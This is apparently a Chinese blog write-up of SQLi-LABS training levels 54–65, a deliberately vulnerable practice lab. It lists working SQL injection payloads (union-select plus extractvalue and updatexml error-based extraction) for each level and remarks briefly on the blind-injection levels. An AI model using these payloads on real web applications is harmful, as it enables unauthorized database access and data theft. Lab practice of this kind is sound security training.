-
SQLi-LABS Page-4 (Challenges)
目录
less-62-GET-单引号括号闭合-无报错-bool盲注
less-65-GET--双引号括号闭合-无报错-bool盲注
less-54-GET-单引号闭合-内联注入
字段数为3,union select 直接完成。
less-55--GET-括号闭合-内联注入-无报错
id=-1) union select 1,(select group_concat(secret_GU33) from x0o8jauhf7),3--+
less-56-GET-单引号括号闭合-内联注入-无报错
和less55一样只是闭合方式不同。
id=-1') union select 1,(select group_concat(secret_GU33) from x0o8jauhf7),3--+
less-57-双引号闭合-内联注入-无报错
和less56一样只是闭合方式不同。
id=-1" union select 1,(select group_concat(secret_QIPL) from zsgtcrhegi),3--+
less-58-GET-单引号闭合-报错注入
id=-1' and extractvalue (1,concat(0x7e,((select group_concat(secret_WYC1) from vyxmh0nt3f)),0x7e))--+
less-59-GET-整形闭合-报错注入
id=1 and updatexml(1,concat(0x7e, ((select group_concat(secret_T9NI )from 8clzoo18ug)),0x7e),1)--+
less-60-GET-双引号括号闭合,报错注入
id=1") and updatexml(1,concat(0x7e, ((select group_concat(secret_C0KN) from 9vhhw9avx8)),0x7e),1)--+
less-61-GET-单引号括号括号闭合-报错注入
id=1')) and updatexml(1,concat(0x7e, ((select group_concat(secret_4M1X) from za1d6wdjxu)),0x7e),1)--+
less-62-GET-单引号括号闭合-无报错-bool盲注
看到这个130次,就知道是盲注了。直接上脚本嘿嘿>-<。
爆数据库名:
完了啊脚本请求太快了表名爆不出来了。难道要手工盲注?
看了一下表名是10位,列名不同的是4位,秘密值24位,给定的限制是130次,就是说一位最多只能猜3次才可以跑出来,注鸡毛啊。根本就是不可能的。
less-63-GET-单引号闭合-无报错-bool盲注
less-64-GET-括号括号闭合-无报错-bool盲注
less-65-GET--双引号括号闭合-无报错-bool盲注
总结
没意思,基本上就是判断闭合方式。
-
相关阅读:
LeetCode 剑指 Offer II 091.粉刷房子 - 原地修改
解决msvcp120.dll丢失的问题的5个方法,修复系统dll问题
[Shell详解-7]:循环语句
mysql 数据库存储引擎怎么选择?快来看看性能测试吧
矩形脉冲波形的占空比及脉冲和瞬态特征的测量
13.Oracle通过JDBC连接Java
如何压缩图片大小?减小图片大小方法来啦
紫光同创FPGA 多路视频处理:图像缩放+视频拼接显示,OV7725采集,提供PDS工程源码和技术支持
6.6.4 PCS创建Oracle 资源及资源组
Dev C++编写C/C++程序 出现[Error] ld returned 1 exit status报错分析及解决
- 原文地址:https://blog.csdn.net/qq_61774705/article/details/126273844
